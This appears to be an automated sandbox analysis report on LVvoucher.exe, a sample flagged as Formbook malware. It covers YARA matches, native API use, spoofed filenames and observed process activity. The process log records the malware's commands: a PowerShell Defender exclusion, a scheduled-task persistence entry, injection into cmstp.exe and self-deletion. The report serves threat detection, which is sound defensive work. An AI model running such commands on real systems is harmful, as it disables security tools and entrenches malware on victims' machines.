Source: 16.2.LVvoucher.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.0.LVvoucher.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.403013185.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000000.349064396.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000000.349590313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.421008053.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.385192046.0000000007996000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.547341324.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.546977078.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.420898472.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.546773415.0000000000560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.420606554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 0_2_00BE3D23	0_2_00BE3D23
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 0_2_013BD3B4	0_2_013BD3B4
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 0_2_013BB970	0_2_013BB970
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 15_2_00303D23	15_2_00303D23
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0040102E	16_2_0040102E
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00401030	16_2_00401030
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041E1DD	16_2_0041E1DD
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041EB66	16_2_0041EB66
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00402D90	16_2_00402D90
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041D5A3	16_2_0041D5A3
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00409E5C	16_2_00409E5C
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00409E60	16_2_00409E60
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041E7EB	16_2_0041E7EB
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00402FB0	16_2_00402FB0
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00CD3D23	16_2_00CD3D23
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047A841F	23_2_047A841F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_0485D466	23_2_0485D466
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04790D20	23_2_04790D20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_048625DD	23_2_048625DD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04862D07	23_2_04862D07
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047AD5E0	23_2_047AD5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04861D55	23_2_04861D55
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047C2581	23_2_047C2581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047B6E30	23_2_047B6E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04862EF7	23_2_04862EF7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_0485D616	23_2_0485D616
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04861FF1	23_2_04861FF1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_048620A8	23_2_048620A8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_048628EC	23_2_048628EC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04851002	23_2_04851002
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047C20A0	23_2_047C20A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047AB090	23_2_047AB090
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047B4120	23_2_047B4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_0479F900	23_2_0479F900
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_048622AE	23_2_048622AE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_0485DBD2	23_2_0485DBD2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_04862B28	23_2_04862B28
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047CEBB0	23_2_047CEBB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9EB66	23_2_02C9EB66
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C89E5C	23_2_02C89E5C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C89E60	23_2_02C89E60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9E7EB	23_2_02C9E7EB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C82FB0	23_2_02C82FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C82D90	23_2_02C82D90

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: String function: 0479B150 appears 35 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041A360 NtCreateFile,	16_2_0041A360
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041A410 NtReadFile,	16_2_0041A410
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041A490 NtClose,	16_2_0041A490
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041A540 NtAllocateVirtualMemory,	16_2_0041A540
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0041A35D NtCreateFile,	16_2_0041A35D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9540 NtReadFile,LdrInitializeThunk,	23_2_047D9540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D95D0 NtClose,LdrInitializeThunk,	23_2_047D95D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_047D9660
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9650 NtQueryValueKey,LdrInitializeThunk,	23_2_047D9650
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_047D96E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D96D0 NtCreateKey,LdrInitializeThunk,	23_2_047D96D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9710 NtQueryInformationToken,LdrInitializeThunk,	23_2_047D9710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,	23_2_047D9FE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9780 NtMapViewOfSection,LdrInitializeThunk,	23_2_047D9780
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,	23_2_047D9860
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9840 NtDelayExecution,LdrInitializeThunk,	23_2_047D9840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	23_2_047D9910
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D99A0 NtCreateSection,LdrInitializeThunk,	23_2_047D99A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9A50 NtCreateFile,LdrInitializeThunk,	23_2_047D9A50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9560 NtWriteFile,	23_2_047D9560
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047DAD30 NtSetContextThread,	23_2_047DAD30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9520 NtWaitForSingleObject,	23_2_047D9520
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D95F0 NtQueryInformationFile,	23_2_047D95F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9670 NtQueryInformationProcess,	23_2_047D9670
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9610 NtEnumerateValueKey,	23_2_047D9610
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047DA770 NtOpenThread,	23_2_047DA770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9770 NtSetInformationFile,	23_2_047D9770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9760 NtOpenProcess,	23_2_047D9760
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9730 NtQueryVirtualMemory,	23_2_047D9730
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047DA710 NtOpenProcessToken,	23_2_047DA710
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D97A0 NtUnmapViewOfSection,	23_2_047D97A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047DB040 NtSuspendThread,	23_2_047DB040
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9820 NtEnumerateKey,	23_2_047D9820
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D98F0 NtReadVirtualMemory,	23_2_047D98F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D98A0 NtWriteVirtualMemory,	23_2_047D98A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9950 NtQueueApcThread,	23_2_047D9950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D99D0 NtCreateProcessEx,	23_2_047D99D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9A20 NtResumeThread,	23_2_047D9A20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9A10 NtQuerySection,	23_2_047D9A10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9A00 NtProtectVirtualMemory,	23_2_047D9A00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9A80 NtOpenDirectoryObject,	23_2_047D9A80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047D9B00 NtSetValueKey,	23_2_047D9B00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_047DA3B0 NtGetContextThread,	23_2_047DA3B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9A360 NtCreateFile,	23_2_02C9A360
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9A490 NtClose,	23_2_02C9A490
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9A410 NtReadFile,	23_2_02C9A410
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9A540 NtAllocateVirtualMemory,	23_2_02C9A540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 23_2_02C9A35D NtCreateFile,	23_2_02C9A35D

Sample file is different than original file name gathered from version info

Source: LVvoucher.exe, 00000000.00000002.358875370.00000000013CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359511322.0000000002FED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.358130389.0000000000CA6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCaseInsensitiveHashCodeProvid.exe4 vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359525046.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaseInsensitiveHashCodeProvid.exe4 vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359525046.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359525046.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.362777435.0000000007FC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359603340.000000000306C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.362619132.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSafeSerializationManager.dll: vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359367595.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs LVvoucher.exe
Source: LVvoucher.exe, 00000000.00000002.359899155.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs LVvoucher.exe
Source: LVvoucher.exe, 0000000F.00000000.345304634.00000000003C6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCaseInsensitiveHashCodeProvid.exe4 vs LVvoucher.exe
Source: LVvoucher.exe, 00000010.00000003.359122688.00000000016FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs LVvoucher.exe
Source: LVvoucher.exe, 00000010.00000000.347327926.0000000000D96000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCaseInsensitiveHashCodeProvid.exe4 vs LVvoucher.exe
Source: LVvoucher.exe, 00000010.00000002.422075548.0000000001A2F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs LVvoucher.exe
Source: LVvoucher.exe, 00000010.00000002.423242531.0000000001C60000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCMSTP.EXE` vs LVvoucher.exe
Source: LVvoucher.exe, 00000010.00000002.421332683.000000000189F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs LVvoucher.exe
Source: LVvoucher.exe	Binary or memory string: OriginalFilenameCaseInsensitiveHashCodeProvid.exe4 vs LVvoucher.exe

Source: LVvoucher.exe	Virustotal: Detection: 41%
Source: LVvoucher.exe	ReversingLabs: Detection: 46%

Source: C:\Users\user\Desktop\LVvoucher.exe

File read: C:\Users\user\Desktop\LVvoucher.exe:Zone.Identifier

Source: unknown	Process created: C:\Users\user\Desktop\LVvoucher.exe "C:\Users\user\Desktop\LVvoucher.exe"
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UcgxBJ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UcgxBJ" /XML "C:\Users\user\AppData\Local\Temp\tmp57C7.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Users\user\Desktop\LVvoucher.exe C:\Users\user\Desktop\LVvoucher.exe
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Users\user\Desktop\LVvoucher.exe C:\Users\user\Desktop\LVvoucher.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LVvoucher.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UcgxBJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UcgxBJ" /XML "C:\Users\user\AppData\Local\Temp\tmp57C7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Users\user\Desktop\LVvoucher.exe C:\Users\user\Desktop\LVvoucher.exe	Jump to behavior
Source: C:\Users\user\Desktop\LVvoucher.exe	Process created: C:\Users\user\Desktop\LVvoucher.exe C:\Users\user\Desktop\LVvoucher.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LVvoucher.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LVvoucher.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: LVvoucher.exe, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: UcgxBJ.exe.0.dr, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.LVvoucher.exe.be0000.0.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.LVvoucher.exe.be0000.0.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.LVvoucher.exe.300000.2.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.LVvoucher.exe.300000.0.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.2.LVvoucher.exe.300000.0.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.LVvoucher.exe.300000.1.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.LVvoucher.exe.300000.3.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.3.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.0.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.9.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.1.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.5.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.LVvoucher.exe.cd0000.1.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.7.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.LVvoucher.exe.cd0000.2.unpack, _5ball/Form1.cs	.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 0_2_013BDCDA pushfd ; ret	0_2_013BDCE1
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 0_2_078333E5 push FFFFFF8Bh; iretd	0_2_078333E7
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00417045 push AE08DEFCh; retf	16_2_00417038
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_00417009 push AE08DEFCh; retf	16_2_00417038
Source: C:\Users\user\Desktop\LVvoucher.exe	Code function: 16_2_0040F175 push cs; retf	16_2_0040F176
